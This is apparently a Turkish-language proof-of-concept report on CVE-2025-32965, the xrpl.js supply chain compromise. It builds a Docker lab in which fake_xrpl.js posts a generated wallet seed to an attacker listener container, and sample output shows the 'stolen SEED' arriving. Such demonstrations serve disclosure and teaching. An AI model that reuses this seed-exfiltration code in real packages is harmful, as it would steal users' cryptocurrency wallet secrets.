# CVE-2025-32965 — xrpl.js Supply Chain Attack PoC Raporu

## Zafiyet Tanımı
- CVE Kodu: CVE-2025-32965
- Zafiyet Türü: Supply Chain Attack (CWE-506: Embedded Malicious Code)
- Hedef: xrpl.js kütüphanesinin 4.2.1–4.2.4 ve 2.14.2 versiyonları
- Etki: Kullanıcının cüzdan seed/secret verisinin saldırgana gönderilmesi

## Hedef
Bu PoC, zararlı bir xrpl.js sürümünün nasıl seed exfiltration (sızdırma) gerçekleştirebileceğini izole bir ortamda göstermeyi amaçlamaktadır.

## Ortam Yapısı
- Platform: Docker (WSL tabanlı Ubuntu)
- Network: xrplnet adlı özel Docker ağı
- Kapsayıcılar:
  - poc-listener: Seed verilerini toplayan saldırgan sunucusu
  - xrpl-poc: Kurban taraflı test scriptlerini barındıran PoC konteyneri

## Kullanılan Dosyalar

package.json:
```json
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}
```

Dockerfile:
```dockerfile
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]
```

fake_xrpl.js:
```javascript
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };
```

test.js:
```javascript
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)
```

server.js:
```javascript
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})
```

## Adımlar

1. Docker Build:
```bash
docker build -t xrpl-poc .
docker network create xrplnet
```

2. Listener'ı Başlat:
```bash
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
```

3. Kurban Seed Göndermesi:
```bash
docker run -it --rm --network xrplnet xrpl-poc node test.js
```

## Çıktı Örneği

Kurban Terminali:
```
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
```

Saldırgan Terminali:
```
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr
```

## Sonuç
Bu PoC, CVE-2025-32965 zafiyetinin pratikte nasıl sömürülebileceğini göstermiştir. Zararlı xrpl.js kütüphanesinin seed exfiltration kodu, izole bir test ortamında başarıyla çalıştırılmış ve saldırgan sunucusuna veri sızdırılmıştır.

## GitHub Repo Yapısı (Önerilen)
```bash
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md
```

Hazırlayan: Yusuf Dalbudak 
Test Ortamı: WSL2 + Docker + Node.js v20


